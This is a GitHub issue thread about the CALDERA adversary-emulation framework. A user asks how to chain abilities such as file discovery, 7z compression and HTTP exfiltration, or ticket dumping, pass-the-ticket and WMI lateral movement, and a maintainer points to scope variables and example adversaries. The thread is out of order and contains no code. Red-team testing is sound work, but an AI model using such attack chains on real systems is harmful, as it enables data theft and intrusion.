Closed rcaroncd closed 4 years ago
host.
and it will only be used on the host it was discovered on #{host.file.sensitive}
for example.Regarding chain attacks, I'd recommend you take a look at how we've constructed some of our demonstration adversaries (hunter and the worm variants).
Okay, I've reviewed your answer, I'll explain:
The file compression ability is one of my own that I created with 7za. I'll check the yaml, but with what you said about the 'scope variables' (which are limited to one machine) I think that solves my problem
I'll review the existing adversaries and see if I can clear up my doubts. Thank you very much for the information provided.
Greetings
@rcaroncd let us know if there's anything else on this topic you want to revisit
Hello, I'm doing tests to perform chained attacks, and I'm encountering problems in passing data from one attack to another. I will explain this using an example of the following combined attack "File Finder + Compressing + HTTP Exfiltration".
This adversary would use 3 phases, one attack in each phase, and they would be as follows:
The idea is that in the first attack a series of files are obtained (absolute path), there is already an ability for this attack, but I've modified it so that it doesn't just show the first 5 files found. The idea is that those paths, I pass them to the next attack, it receives them and compresses them into a 7z file. After that, pass the resulting 7z file path to the next attack and exfiltrate it via HTTP to Caldera's server.
I have encountered several problems here:
I find problems like these for different multiphase attacks that I'm trying to implement (e.g. dump tickets + pass the ticket + lateral movement with WMI). And I'm having a hard time trying to reproduce the behavior of an attacker.
I'm probably doing something wrong, or I'm missing something, but I think the documentation is in process and there's not much detail about how to pass data between attacks, how to use facts, relationships, and parsers.
Is it possible to implement this sort of attack chains in CALDERA, as of today? How can it be done?
Thanks in advance and thank you very much for the great work you're doing.